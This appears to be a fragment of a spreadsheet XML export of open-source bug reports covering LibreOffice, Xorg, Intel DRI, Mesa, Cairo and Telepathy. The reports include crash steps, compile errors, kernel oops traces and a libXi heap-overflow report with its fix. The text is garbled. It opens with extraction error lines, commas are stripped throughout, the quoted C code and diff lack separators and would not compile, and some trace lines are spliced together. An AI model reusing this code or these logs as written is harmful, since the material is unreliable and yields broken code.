render: copy #0 at 00 failed: read 0x00d00000
render: copy #1 at 10 failed: read 0x00d00001
render: copy #2 at 20 failed: read 0x00d00002
render: copy #3 at 30 failed: read 0x00d00003
render: copy #4 at 40 failed: read 0x00d00004
render: copy #5 at 50 failed: read 0x00d00005
render: copy #6 at 60 failed: read 0x00d00006
render: copy #7 at 70 failed: read 0x00d00007
render: copy #8 at 80 failed: read 0x00d00008
Description:
------------------------------
This issue caused by I-G-T not the kernel. It's like gem_ringfill.c add some function to verify the case make it failed.
Process:
------------------------------
1. git pull
2. git log gem_ringfill.c
3. ./gem_ringfill.c
Result:
------------------------------
latest commit: 64f669f7a94d459437a4dd47142ef2bb9870c5e ---&gt; failed
the second commit: ca2851f827d5f60283dc8c202006a2f5095c738 ---&gt; succeed</t>
  </si>
  <si>
    <t>LIBREOFFICE-45908</t>
  </si>
  <si>
    <t>FILEOPEN: Layout loop caused by tabs</t>
  </si>
  <si>
    <t>Created attachment 56887
file for reproducing the loop
Problem description: 
Steps to reproduce:
 * Open attached file
Current behavior:
 * Writer entered an infinite loop
Expected behavior:
 * Open the document</t>
  </si>
  <si>
    <t>XORG-1547</t>
  </si>
  <si>
    <t>Compile Failure</t>
  </si>
  <si>
    <t>Xfont package wants fontcacheP.h which is not included in the package so it
won't compile.</t>
  </si>
  <si>
    <t>Evan</t>
  </si>
  <si>
    <t>LIBREOFFICE-63133</t>
  </si>
  <si>
    <t>write tools/tempfiles.hxx out</t>
  </si>
  <si>
    <t>Background: tools is a library packed full of deprecated code that has equivalents in sal/ (the system abstraction layer). Of course the sal/ versions are often less usable than the tools/ version so some API improvements may be required on the way too.
tools/tempfiles.hxx defines the TempFile class which is still used at some random places in the codebase. To find them all:
git grep 
The equivalent class from sal is osl::FileBase::createTempFile.</t>
  </si>
  <si>
    <t>palenik.mihaly</t>
  </si>
  <si>
    <t>LIBREOFFICE-47646</t>
  </si>
  <si>
    <t>EDITING: Crash after undo'ing multiple steps</t>
  </si>
  <si>
    <t>Problem description: 
Steps to reproduce:
1. Mark any drawing wich consists of various lines circles...
2. ...move it with the arrow buttons stepwise to another place...
3. ...undo as much steps as possible...
4. ...press any button and you're done!
Current behavior: LibreOffice crashes
Expected behavior: LibreOffice don't crashes
Platform (if different from the browser): 
Browser: Mozilla/5.0 (Windows NT 6.1 WOW64 rv:11.0) Gecko/20100101 Firefox/11.0</t>
  </si>
  <si>
    <t>th.sammer</t>
  </si>
  <si>
    <t>LIBREOFFICE-40093</t>
  </si>
  <si>
    <t>LibreOffice crash when ellipse is adjusted</t>
  </si>
  <si>
    <t>Created attachment 50214
PrintScreen
1.ellipse is arranged.
2.It right-clicks in the mouse. It selects Line from Contextual menu.
3.Style changes from Continuous to Ultrafine dashed.
  (Width changes from 0.00cm to 0.30cm.)
4.Whet size of ellipse is adjusted by use mouse  LiberOffice crash</t>
  </si>
  <si>
    <t>urumeniboshi</t>
  </si>
  <si>
    <t>TELEPATHY-27183</t>
  </si>
  <si>
    <t>Document that mutual subscription is UI/server policy</t>
  </si>
  <si>
    <t>The ContactList interface is silent on the issue of whether accepting a subscription request should also make the CM subscribe in the other direction. It'd be good to explicitly document that the CM shouldn't do this.</t>
  </si>
  <si>
    <t>LIBREOFFICE-34306</t>
  </si>
  <si>
    <t>Problem importing function GETPIVOTDATA from Excel</t>
  </si>
  <si>
    <t>Created attachment 43392
example of conversion error
When in pivot table a item in a field is empty if is present a pivot function
that takes a value insite pivot the conversion of this function isn't correct.
The syntax for this Excel function is (italian version):			
=INFO.DATI.TAB.PIVOT(AMOUNT$G$1OFFICEBYEAR2006VOICE)
it is converted as:
=GETPIVOTDATA(AMOUNT$G$1OFFICEBYEAR2006VOICE)
The conversion should put  (2 contiguous quotes) to indicate empty value 
because CALC function use this method to rappresent it.
For example I write the correct conversion that CALC should do:
=GETPIVOTDATA(AMOUNT$G$1OFFICEBYEAR2006VOICE)</t>
  </si>
  <si>
    <t>rossetti.danilo</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-77655</t>
  </si>
  <si>
    <t>tapping the XML</t>
  </si>
  <si>
    <t>More patches to fix some small things and arrange the texts more consistently.  The commit messages should say enough except maybe the third: it not just replaces hexadecimal codes with symbolic names but also extends a bit the second Persian layout.  This second layout adds the keypad but then *excludes* the ASCII digits on the fourth level which seems weird and unintentional to me.  Adding them cannot do any harm I would think so I've added the include.
The fifth patch normalizes the indentation of the lists of languade codes.  Maybe deviant layout was chosen on purpose to be more conspicuous but it hasn't been done consistently so I've normalized it.</t>
  </si>
  <si>
    <t>XORG-6315</t>
  </si>
  <si>
    <t>compile error in evdev driver</t>
  </si>
  <si>
    <t>Hi it's me again.
I am now trying to backport the changes in CVS Head evdev driver to monolithic X
tree in hope it fixes the xkb and mouse button mapping inconsistencis I have. 
Everything is fine except on of the latest changes namely the set_bit function.
To use this function we have an include statement : #include 
My gcc bails out at this!
Here's the compile output :
gcc -m32 -O2 -pipe -Wp-D_FORTIFY_SOURCE=2 -march=i586 -mtune=pentiumpro
-fno-strict-aliasing -fno-strength-reduce -ansi -Wall -Wpointer-arith -Wundef 
-fPIC  -I. -I../../../../../../programs/Xserver/hw/xfree86/common
-I../../../../../../programs/Xserver/hw/xfree86/loader
-I../../../../../../programs/Xserver/hw/xfree86/os-support       
-I../../../../../../programs/Xserver/include
-I../../../../../../programs/Xserver/mi -I../../../../../../exports/include/X11
-I../../../../../../include/extensions  -I../../../../../..
-I../../../../../../exports/include   -Dlinux -D__i386__
-D_POSIX_C_SOURCE=199309L                          -D_POSIX_SOURCE
-D_XOPEN_SOURCE                                 -D_BSD_SOURCE -D_SVID_SOURCE   
                             -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
-D_GNU_SOURCE                            -DSHAPE -DXINPUT -DXKB -DLBX
-DXAPPGROUP       -DXCSECURITY -DTOGCUP   -DXF86BIGFONT -DDPMSExtension  
-DXPRINT -DPIXPRIV -DPANORAMIX   -DRENDER -DRANDR       -DXFIXES -DDAMAGE
-DCOMPOSITE -DXEVIE -DGCCUSESGAS -DAVOID_GLYPHBLT -DPIXPRIV -DSINGLEDEPTH      
                   -DXFreeXDGA -DXvExtension                               
-DXFree86LOADER -DDLOPEN_HACK -DXFree86Server                          
-DXF86VIDMODE                  -DXvMCExtension                         
-DSMART_SCHEDULE                       -DBUILDDEBUG -DXResExtension            
                -DX_BYTE_ORDER=X_LITTLE_ENDIAN                         
-DXORG_VERSION_CURRENT=(((6) * 10000000) + ((9) * 100000) + ((0) * 1000) + 0)
-DNDEBUG   -DFUNCPROTO=15 -DNARROWPROTO  -DIN_MODULE -DXFree86Module    -c evdev.c
In file included from evdev.h:80
                 from evdev.c:69:
/usr/include/asm/bitops.h:37: error: syntax error before 'void'
/usr/include/asm/bitops.h:54: error: syntax error before 'void'
/usr/include/asm/bitops.h:72: error: syntax error before 'void'
/usr/include/asm/bitops.h:80: error: syntax error before 'void'
/usr/include/asm/bitops.h:99: error: syntax error before 'void'
/usr/include/asm/bitops.h:117: error: syntax error before 'void'
/usr/include/asm/bitops.h:134: error: syntax error before 'int'
/usr/include/asm/bitops.h:154: error: syntax error before 'int'
/usr/include/asm/bitops.h:174: error: syntax error before 'int'
/usr/include/asm/bitops.h:194: error: syntax error before 'int'
/usr/include/asm/bitops.h:206: error: syntax error before 'int'
/usr/include/asm/bitops.h:225: error: syntax error before 'int'
/usr/include/asm/bitops.h:245: error: syntax error before 'int'
/usr/include/asm/bitops.h:250: error: syntax error before 'int'
/usr/include/asm/bitops.h:276: error: syntax error before 'int'
/usr/include/asm/bitops.h:316: error: syntax error before 'int'
/usr/include/asm/bitops.h:350: error: syntax error before 'unsigned'
/usr/include/asm/bitops.h:364: error: syntax error before 'unsigned'
evdev.c: In function 'EvdevReadInput':
evdev.c:97: warning: format '%ld' expects type 'long int' but argument 6 has
type 'unsigned int'
evdev.c: In function 'EvdevParseBits':
evdev.c:356: warning: pointer targets in passing argument 2 of 'set_bit' differ
in signedness
evdev.c:358: warning: pointer targets in passing argument 2 of 'set_bit' differ
in signedness
make: *** [evdev.o] Error 1
Is there a way to include the header without breaking the compile? Or maybe we
can use a custom assembly function ? ( say copied from the include file? )
Any help appreciated. Thank you.</t>
  </si>
  <si>
    <t>pharon</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-12195</t>
  </si>
  <si>
    <t>Add mimetype for vala source code</t>
  </si>
  <si>
    <t>Hi
please consider applying the attached patch to shared-mime-info for the addition of a mimetype for vala source code.
http://live.gnome.org/Vala
Bye</t>
  </si>
  <si>
    <t>LIBREOFFICE-61770</t>
  </si>
  <si>
    <t>EDITING: Instant Count  produces Framework Scripting Error</t>
  </si>
  <si>
    <t>Problem description: 
The extension 'Instant Count' does not work on the 4.0.0.3 release. 
Steps to reproduce:
1. Write text
2.Click 'Tools' and select 'Instant Count'
3. LibreOffice Error dialogue box appears
Current behavior:
The dialogue box says A Scripting Framework error occurred while running the Python script vnd.sun.star.script:wordcount.oxt|wc|wc.py$wordCount?language=Python&amp;location=user:uno_packages.
Message: : invalid syntax (wc.py line 54)
  C:\Program Files (x86)\LibreOffice 4.0\program\pythonscript.py:434 in function getModuleByUrl() [code = compile( src encfile(uno.fileUrlToSystemPath( url ) ) exec )]
  C:\Program Files (x86)\LibreOffice 4.0\program\pythonscript.py:938 in function getScript() [mod = self.provCtx.getModuleByUrl( fileUri )]
Expected behavior:
It should count and display the number of words in the document. 
Operating System: Windows 7
Version: 4.0.0.3 release</t>
  </si>
  <si>
    <t>stephenaustinmail</t>
  </si>
  <si>
    <t>LIBREOFFICE-81147</t>
  </si>
  <si>
    <t>Assertion failure when right-clicking and selecting Area... on a graphic in Writer</t>
  </si>
  <si>
    <t>Open a Writer document add a rectangle right-click on it select Area... It crashes with an ssertion failure: include/rtl/ref.hxx:166: reference_type *rtl::Reference::operator-&gt;() const [reference_type = XColorList]: Assertion `m_pBody != 0' failed</t>
  </si>
  <si>
    <t>XORG-36592</t>
  </si>
  <si>
    <t>copyRawEvent() copies data outside of allocated space causing heap corruption</t>
  </si>
  <si>
    <t>In trying to understand a heap corruption when I added XI2 RawMotion event handling to our Xinput-based application I came across the following routine copyRawEvent() in libxi-1.3/src/XExtInt.c.  My question is what is the purpose of computing len if it is not used?  Should it have been used as an argument to malloc(). 
copyRawEvent(XGenericEventCookie *cookie_in
             XGenericEventCookie *cookie_out)
{
    XIRawEvent *in *out
    void *ptr
    int len
    int bits
    in = cookie_in-&gt;data
    bits = count_bits(in-&gt;valuators.mask in-&gt;valuators.mask_len)
    len = sizeof(XIRawEvent) + in-&gt;valuators.mask_len
    len += bits * sizeof(double) * 2
    ptr = cookie_out-&gt;data = malloc(sizeof(XIRawEvent))
    if (!ptr)
        return False
    out = next_block(
    *out = *in
    out-&gt;valuators.mask = next_block(
    memcpy(out-&gt;valuators.mask in-&gt;valuators.mask out-&gt;valuators.mask_len)
    out-&gt;valuators.values = next_block(
    memcpy(out-&gt;valuators.values in-&gt;valuators.values bits * sizeof(double))
    out-&gt;raw_values = next_block(
    memcpy(out-&gt;raw_values in-&gt;raw_values bits * sizeof(double))
    return True
}
When I use valgrind I get the following output as the culprit for the crash
==4166== Invalid write of size 1
==4166==    at 0x4C29F04: memcpy (mc_replace_strmem.c:497)
==4166==    by 0x8F39180: ??? (in /usr/lib/libXi.so.6.1.0)
==4166==    by 0x7433D48: _XCopyEventCookie (in /usr/lib/libX11.so.6.3.0)
==4166==    by 0x7425166: XPeekEvent (in /usr/lib/libX11.so.6.3.0)
==4166==    by 0x49C3E3: process_key (x11_be.c:1065)
==4166==    by 0x49EA5C: event_key_release (x11_be.c:2201)
==4166==    by 0x49DD6E: x11_be_process_events (x11_be.c:1892)
==4166==    by 0x4A38F4: x11_be_main_loop (x11_be.c:4353)
==4166==    by 0x4A39E1: x11_be_thread_main (x11_be.c:4385)
==4166==    by 0x87549C9: start_thread (pthread_create.c:300)
==4166==    by 0x8A516FC: clone (clone.S:112)
==4166==  Address 0x168afe80 is 0 bytes after a block of size 96 alloc'd
==4166==    at 0x4C284A8: malloc (vg_replace_malloc.c:236)
==4166==    by 0x8F390BD: ??? (in /usr/lib/libXi.so.6.1.0)
==4166==    by 0x7433D48: _XCopyEventCookie (in /usr/lib/libX11.so.6.3.0)
==4166==    by 0x7425166: XPeekEvent (in /usr/lib/libX11.so.6.3.0)
==4166==    by 0x49C3E3: process_key (x11_be.c:1065)
==4166==    by 0x49EA5C: event_key_release (x11_be.c:2201)
==4166==    by 0x49DD6E: x11_be_process_events (x11_be.c:1892)
==4166==    by 0x4A38F4: x11_be_main_loop (x11_be.c:4353)
==4166==    by 0x4A39E1: x11_be_thread_main (x11_be.c:4385)
==4166==    by 0x87549C9: start_thread (pthread_create.c:300)
Thanks in advance
Roger R. Cruz
--------------
BTW changing the code to use len rather than the sizeof() fixed my crash.
diff ../../libXi-1.3-orig/src/XExtInt.c src/XExtInt.c
1196c1196
data = malloc(sizeof(XIRawEvent))
---
&gt;     ptr = cookie_out-&gt;data = malloc(len)</t>
  </si>
  <si>
    <t>roger.cruz</t>
  </si>
  <si>
    <t>DRI-28174</t>
  </si>
  <si>
    <t>[945gm] kernel 2.6.34 after a long time gpu hangs</t>
  </si>
  <si>
    <t>using desktop normally after a while the gpu hangs. 
i can still move the mouse but screen stops updating.
dmesg says
---
[drm:i915_hangcheck_elapsed] *ERROR* Hangcheck timer elapsed... GPU hung
render error detected EIR: 0x00000000
[drm:i915_do_wait_request] *ERROR* i915_do_wait_request returns -5 (awaiting 1316971 at 1316969)
---
hardware:
00:02.0 VGA compatible controller: Intel Corporation Mobile 945GM/GMS 943/940GML Express Integrated Graphics Controller (rev 03)
software:
kernel 2.6.34
xf86-video-intel 2.10
xorg 1.7.6</t>
  </si>
  <si>
    <t>tmezzadra</t>
  </si>
  <si>
    <t>CAIRO-16174</t>
  </si>
  <si>
    <t>libtool 2.2</t>
  </si>
  <si>
    <t>I did a few update of autofoo stuff (based on `autoupdate') + libtool 2.2.4.
I have a fairly recent environment system (almost everything from autofoo git trees).
This patch can be wrong beware :)
Patch attached</t>
  </si>
  <si>
    <t>DRI-96983</t>
  </si>
  <si>
    <t>Erratic mouse cursor with ghosting and artifacts on external monitor via dock (vga+hdmi)</t>
  </si>
  <si>
    <t>Around mid June 2016 compile of the linux drm intel nightly branch kernel the mouse cursor has erratic behavior.  The issue starts happening between commits from 2016-06-13 and 2016-06-21.
I have a dell xps 13 9350 connected via usb-c to a dock (dell WD15) which has two external monitors connected to the dock via hdmi and vga port.
The mouse when moving from one external monitor to the other creates a ghost trail of cursors.  The cursor jumps around erractically on display but the actual cursor is somewhere else.
Please ask which details I can provide as there is nothing showing in dmesg.  
I've tried with two different mouse (logitech g700 and razer mamba).  This issue does not happen in mainline branch kernel.</t>
  </si>
  <si>
    <t>frankshin82</t>
  </si>
  <si>
    <t>TELEPATHY-29042</t>
  </si>
  <si>
    <t>telepathy-butterfly crashed with TypeError in quit()</t>
  </si>
  <si>
    <t>this report has been filed here:
https://bugs.edge.launchpad.net/ubuntu/+source/telepathy-butterfly/+bug/604806
This is on telepathy-butterfly 0.5.12.
When I quit empathy (signed in with google talk msn and local network chat) telepathy-butterfly crashed and asked me to send this bug report.
traceback:
Traceback (most recent call last):
  File /usr/lib/python2.6/dist-packages/butterfly/util/decorator.py line 87 in async_function
    func(*args **kwargs)
  File /usr/lib/telepathy/telepathy-butterfly line 67 in quit
    manager.quit()
  File /usr/lib/python2.6/dist-packages/butterfly/connection_manager.py line 87 in quit
    conns = self._connections[:]
TypeError: 'set' object is unsubscriptable</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-19067</t>
  </si>
  <si>
    <t>real name: Francisco Jerez
email address: currojerez at gmail dot com
preferred account name: currojerez
GPG key ID: 6A842397</t>
  </si>
  <si>
    <t>LIBREOFFICE-54514</t>
  </si>
  <si>
    <t>PRINT PREVIEW: Old icon for page left</t>
  </si>
  <si>
    <t>in the page navigation in Print preview the icon for page left is still the old one (open book with left arrow) insteed of the new hollow big arrow.
Just a booboo.</t>
  </si>
  <si>
    <t>homaka</t>
  </si>
  <si>
    <t>DRI-105310</t>
  </si>
  <si>
    <t>[BAT] igt@kms_chamelium@* - fail - Failed assertion: !chamelium-&gt;env.fault_occurred</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3857/fi-kbl-7500u/igt@kms_chamelium@dp-hpd-fast.html
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3857/fi-kbl-7500u/igt@kms_chamelium@dp-edid-read.html
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3857/fi-kbl-7500u/igt@kms_chamelium@dp-crc-fast.html
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3857/fi-kbl-7500u/igt@kms_chamelium@hdmi-hpd-fast.html
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3857/fi-kbl-7500u/igt@kms_chamelium@hdmi-edid-read.html
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3857/fi-kbl-7500u/igt@kms_chamelium@hdmi-crc-fast.html
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3857/fi-kbl-7500u/igt@kms_chamelium@vga-hpd-fast.html
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3857/fi-kbl-7500u/igt@kms_chamelium@vga-edid-read.html
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3857/fi-kbl-7500u/igt@kms_chamelium@common-hpd-after-suspend.html
(kms_chamelium:4020) igt-chamelium-CRITICAL: Test assertion failure function chamelium_rpc file igt_chamelium.c:302:
(kms_chamelium:4020) igt-chamelium-CRITICAL: Failed assertion: !chamelium-&gt;env.fault_occurred
(kms_chamelium:4020) igt-chamelium-CRITICAL: Chamelium RPC call failed: RPC failed at server.  :unknown encoding: string-escape
Subtest common-hpd-after-suspend failed.</t>
  </si>
  <si>
    <t>MESA-39083</t>
  </si>
  <si>
    <t>[regression bisected r600g] Wrong rendering of Bubbles3D screensaver</t>
  </si>
  <si>
    <t>Instead of looking smooth and nicely translucent some part of bubbles appear to be opaque. I've bisected and the commit that caused this bad rendering is:
86f8b4117f35c788c8a043c2e241eb19eaacae8c
- r600g: LIT: swap MUL_LIT operands to fix 0^0
This is on AMD Radeon HD 5750 and with XScreenSaver 5.14</t>
  </si>
  <si>
    <t>COLORD-48637</t>
  </si>
  <si>
    <t>colord somehow seems to keep /dev/mapper/foo busy</t>
  </si>
  <si>
    <t>This problem comes from a downstream bug report:
https://bugs.mageia.org/show_bug.cgi?id=5337
Basically the problem is that the user in question as an encrypted partition which he unlocks during his user login. If the partition is unlocked when colord starts the fact that colord is running actually prevents him from running luksClose with a Device or Resource Busy (note that the encrypted drive is already unmounted by this stage it's purely the tidying up of the encrypted volume that's failing).
Killing colord allows the operation to succeed.
Note this only happens if colord is started *after* the partition is unlocked (i.e. dbus activated by the user login). If it's started earlier (either manually or by a different (i.e. test) user logging in first before the encrypted partition is unlocked) then there is no problem.
Now I'm pretty certainly that colord itself is not playing with /dev/mapper/* or /dev/dm* stuff but perhaps it's doing something that could interfere somehow? I don't know maybe inotify stuff that somehow misbehaves or some external library that is doing weird things? Figured you'd be the best person to ask for advice at the very least! I did have a quick scan through the code but nothing jumped out at me.
Note that cupsd also seems to be doing similar things so this could have the same root cause or simply have similar problems.</t>
  </si>
  <si>
    <t>CAIRO-23539</t>
  </si>
  <si>
    <t>bitmap font is not scaled by cairo_scale()</t>
  </si>
  <si>
    <t>Created attachment 28944
cairo_bitmap_font_scale.c
This bug was reported as bug 18001 about 1 year ago.
Actually it is not only reproducible with PS backend but also with image and PDF backend perhaps all backend.
It is not only reproducible with freetype fonts either. I can reproduce it with Windows. See (https://bugzilla.mozilla.org/show_bug.cgi?id=448186)
However I filed this bug against freetype font backend because I think different font backend may require different fixes.
Please correct me if I were wrong.
Steps to reproduce:
1) Enable bitmap font on Ubuntu or use Solaris.
See: http://www.alanbriolat.co.uk/2009/04/enable-bitmap-fonts-on-ubuntu-jaunty/
2) Run fc-match Courier
Make sure you get a *.pcf or *.pcf.gz file.
3) Compile and run attached cairo_bitmap_font_scale.c.
4) If you change Courier to a non bitmap font the result is correct.
I've proposed a draft fix half a year ago in mozilla bug 448186.
Attached try.patch.
However I don't think it's the right fix.
If we do _transform_glyph_bitmap() there it will make the glyph unreadable if it is scaled down to 50% or 30%.
For PS if we use scale operator inside /Glyphs we can get a better result.
(suggested by Adrian Johnson in https://bugzilla.mozilla.org/show_bug.cgi?id=448186#c7)
But I don't know how should I pass the CTM through scaled_glyph.</t>
  </si>
  <si>
    <t>ginn.chen</t>
  </si>
  <si>
    <t>DRI-104566</t>
  </si>
  <si>
    <t>[CI] igt@kms_flip@busy-flip[-interruptible] - Incomplete - owatch Softdog</t>
  </si>
  <si>
    <t>Regression started on CI_DRM_3615 and reproduced on so far all consecutive runs:
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3615/shard-snb5/igt@kms_flip@busy-flip.html
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3615/shard-hsw5/igt@kms_flip@busy-flip.html
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3615/shard-apl3/igt@kms_flip@busy-flip.html
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3615/shard-kbl6/igt@kms_flip@busy-flip.html
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3615/shard-glkb3/igt@kms_flip@busy-flip.html
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3615/shard-snb3/igt@kms_flip@busy-flip-interruptible.html
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3615/shard-hsw4/igt@kms_flip@busy-flip-interruptible.html
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3615/shard-apl1/igt@kms_flip@busy-flip-interruptible.html
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3615/shard-kbl5/igt@kms_flip@busy-flip-interruptible.html
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3615/shard-glkb1/igt@kms_flip@busy-flip-interruptible.html
[   41.044561] stack segment: 0000 [#1] PREEMPT SMP PTI
[   41.044565] Dumping ftrace buffer:
[   41.044570]    (ftrace buffer empty)
[   41.044572] Modules linked in: snd_hda_codec_hdmi i915 x86_pkg_temp_thermal intel_powerclamp coretemp crct10dif_pclmul crc32_pclmul ghash_clmulni_intel r8169 snd_hda_codec_realtek mii snd_hda_codec_generic lpc_ich snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm mei_me mei prime_numbers
[   41.044594] CPU: 0 PID: 1647 Comm: kms_flip Tainted: G     U           4.15.0-rc7-CI-CI_DRM_3615+ #1
[   41.044596] Hardware name: MSI MS-7924/Z97M-G43(MS-7924) BIOS V1.12 02/15/2016
[   41.044600] RIP: 0010:kfree+0x66/0x2d0
[   41.044602] RSP: 0018:ffffc90000b1bbd0 EFLAGS: 00010203
[   41.044605] RAX: ffffea0000000000 RBX: 6b6b6b6b6b6b6b6b RCX: 0000000000000001
[   41.044606] RDX: 00000000000003d6 RSI: ffffffff82246460 RDI: ffff88040370d818
[   41.044608] RBP: 01ad998dadadad80 R08: 0000000000000000 R09: 0000000000000000
[   41.044609] R10: 0000000000000000 R11: 0000000000000001 R12: ffffffff815a32cd
[   41.044611] R13: 0000000000000000 R14: 0000000000000000 R15: ffffc90000b1bce0
[   41.044613] FS:  00007fdb45f4ba40(0000) GS:ffff88041fa00000(0000) knlGS:0000000000000000
[   41.044615] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   41.044616] CR2: 00007fdb40dfa220 CR3: 0000000403400006 CR4: 00000000001606f0
[   41.044618] Call Trace:
[   41.044623]  __drm_atomic_helper_crtc_destroy_state+0x3d/0xb0
[   41.044626]  drm_atomic_helper_crtc_destroy_state+0xc/0x20
[   41.044629]  drm_atomic_state_default_clear+0xbe/0x1c0
[   41.044665]  intel_atomic_state_clear+0x9/0x20 [i915]
[   41.044668]  __drm_atomic_state_free+0xe/0x50
[   41.044672]  drm_atomic_helper_page_flip+0x67/0x90
[   41.044677]  drm_mode_page_flip_ioctl+0x467/0x4e0
[   41.044683]  ? drm_mode_cursor2_ioctl+0x10/0x10
[   41.044686]  drm_ioctl_kernel+0x60/0xa0
[   41.044689]  drm_ioctl+0x290/0x330
[   41.044692]  ? drm_mode_cursor2_ioctl+0x10/0x10
[   41.044698]  ? trace_hardirqs_on_caller+0xde/0x1c0
[   41.044701]  ? _raw_spin_unlock_irq+0x2f/0x50
[   41.044705]  ? finish_task_switch+0xa5/0x210
[   41.044707]  ? finish_task_switch+0x6a/0x210
[   41.044712]  do_vfs_ioctl+0x8a/0x670
[   41.044715]  ? entry_SYSCALL_64_fastpath+0x5/0x89
[   41.044718]  ? trace_hardirqs_on_caller+0xde/0x1c0
[   41.044722]  SyS_ioctl+0x36/0x70
[   41.044725]  entry_SYSCALL_64_fastpath+0x1c/0x89
[   41.044727] RIP: 0033:0x7fdb4414a587
[   41.044729] RSP: 002b:00007ffdb0524358 EFLAGS: 00000246
[   41.044733] Code: 48 01 dd 0f 82 7b 02 00 00 48 b8 00 00 00 80 ff 77 00 00 48 01 c5 48 b8 00 00 00 00 00 ea ff ff 48 c1 ed 0c 48 c1 e5 06 48 01 c5  8b 45 20 48 8d 50 ff a8 01 48 0f 45 ea 48 8b 55 20 48 8d 42 
[   41.044783] RIP: kfree+0x66/0x2d0 RSP: ffffc90000b1bbd0
[   41.044785] ---[ end trace 1f87461e46e8d75b ]---</t>
  </si>
  <si>
    <t>XORG-12160</t>
  </si>
  <si>
    <t>compilation broken due to the libpciaccess related rework</t>
  </si>
  <si>
    <t>Master does not compile anymore when libpciaccess is installed</t>
  </si>
  <si>
    <t>dodji</t>
  </si>
  <si>
    <t>LIBREOFFICE-53230</t>
  </si>
  <si>
    <t>FILEOPEN particular .ods from LibO 3.0.0 shows all form fields at wrong horizontal position</t>
  </si>
  <si>
    <t>Created attachment 65262
Test Kit
This is a spin off from Bug 53229 - FILEOPEN particular .ods from LibO 3.0.0 shows grouped form fields at wrong horizontal position
Until 3.6 only grouped objects were shown at wrong position in 3.7.also single objects are affected.
Steps how to reproduce  with parallel installation of Master LOdev  3.7.0.0.alpha0+   - WIN7 Home Premium (64bit) ENGLISH UI [Build ID: 66e4540] (tinderbox:Win-x86@6 pull time 2012-07-26 02:09:47):
1. Open SimpleSample330.ods created with 3.3.0
2. compare position of checkboxes in the document with view in 3.3.0 
   (see SimpleSample330.pdf)
   Expected: horizontal position for SingleCheckbox and Markierfeld group
             should be left end of column H or at least only grouped
             boxes wrongly in Column G
   Actual: Group shifted to the left Starts in column W
           Single box now in Column A
Complared to 3.6.0.4 group is even more shifted to the left single cell now at the left end of sheet.
That was still ok with 3.3.0
@Ryszard:
Can you confirm this problem?</t>
  </si>
  <si>
    <t>DRI-101460</t>
  </si>
  <si>
    <t>[GLK] general protection fault in i915_gem_object_info</t>
  </si>
  <si>
    <t>Created attachment 131990
crash log.
[    6.992374] Bluetooth: L2CAP socket layer initialized
[    6.992386] Bluetooth: SCO socket layer initialized
[   22.000173] general protection fault: 0000 [#1] PREEMPT SMP
[   22.000181] Modules linked in: uinput acpi_als kfifo_buf industrialio bluetooth ecdh_generic lzo zram fuse cfg80211(O) compat(O) ip6table_filter asix usbnet mii
[   22.000202] CPU: 1 PID: 733 Comm: chrome Tainted: G     U     O    4.12.0-rc4-cros-be-ga02eede86890-dirty #1
[   22.000205] Hardware name: Intel glkrvp/glkrvp BIOS Intel_glkrvp.9623.0.2017_06_09_1457 06/09/2017
[   22.000208] task: ffffa27fb7ac4100 task.stack: ffffae7001044000
[   22.000216] RIP: 0010:per_file_stats+0x6a/0xc3
[   22.000219] RSP: 0018:ffffae7001047c88 EFLAGS: 00010287
[   22.000222] RAX: deacffffffffff20 RBX: ffffa27fa5a51e60 RCX: dead000000000100
[   22.000224] RDX: ffffae7001047d18 RSI: ffffa27fb79317d0 RDI: ffffa27fb7b71500
[   22.000226] RBP: ffffae7001047c88 R08: ffffa27fb7b713a8 R09: 0000000000000000
[   22.000229] R10: ffffa27fba14c4e0 R11: 00000000000000c0 R12: ffffa27fb66d8c38
[   22.000231] R13: ffffffff8ebf1f08 R14: ffffae7001047d18 R15: ffffa27fba148108
[   22.000234] FS:  00007f5251d8c780(0000) GS:ffffa27fbfc80000(0000) knlGS:0000000000000000
[   22.000236] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   22.000239] CR2: 00002eb770bd7000 CR3: 000000017794e000 CR4: 00000000003406e0
[   22.000241] Call Trace:
[   22.000248]  idr_for_each+0x4a/0xd1
[   22.000252]  i915_gem_object_info+0x28c/0x36e
[   22.000258]  seq_read+0x1a9/0x38d
[   22.000264]  full_proxy_read+0x5c/0x8b
[   22.000269]  __vfs_read+0x35/0xc0
[   22.000273]  ? fsnotify_perm+0x64/0x6f
[   22.000276]  ? security_file_permission+0x3b/0x42
[   22.000280]  vfs_read+0xa9/0xc5
[   22.000283]  SyS_read+_fastpath+0x13/0x94
[   22.000292] RIP: 0033:0x7f52521ddf0x5f/0xa3
[   22.000289]  entry_SYSCALL_644d
[   22.000295] RSP: 002b:00007ffdcf82d400 EFLAGS: 00000293 ORIG_RAX: 0000000000000000
[   22.000298] RAX: ffffffffffffffda RBX: 00002eb76f1bcd80 RCX: 00007f52521ddf4d
[   22.000300] RDX: 0000000000010000 RSI: 00002eb770bd7000 RDI: 0000000000000072
[   22.000302] RBP: 00007ffdcf82d440 R08: 00007f5251d8c780 R09: 00002eb770bd7000
